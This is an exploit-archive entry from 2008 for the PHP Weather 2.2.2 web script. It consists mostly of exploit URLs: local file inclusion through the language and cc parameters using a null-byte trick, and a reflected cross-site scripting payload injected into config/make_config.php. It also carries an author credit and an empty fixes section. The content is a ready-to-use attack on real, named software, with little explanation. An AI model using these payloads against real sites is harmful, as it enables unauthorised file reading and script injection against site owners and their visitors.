PHP Weather 2.2.2 (LFI-XSS) Multiple Remote Vulnerabilities
2008-12-14 04:30:07****(Lfi/xss)****script: phpweather-2.2.2***************************************************************************download from:http://downloads.sourceforge.net/phpweather/phpweather-2.2.2.zip?modtime=1087430400&big_mirror=0 *************************************************************************** ***************************************************xpl:www.site.com/path/[email protected]&language=[Lfi]%00www.site.com/path/index.php?cc=[Lfi]xss:www.site.com/path/config/make_config.php/>"><ScRiPt>alert(0)</ScRiPt>..................................................Author: ahmadbady from:iran***************************************************#
Fixes
No fixesIn order to submit a new fix you need to be registered.

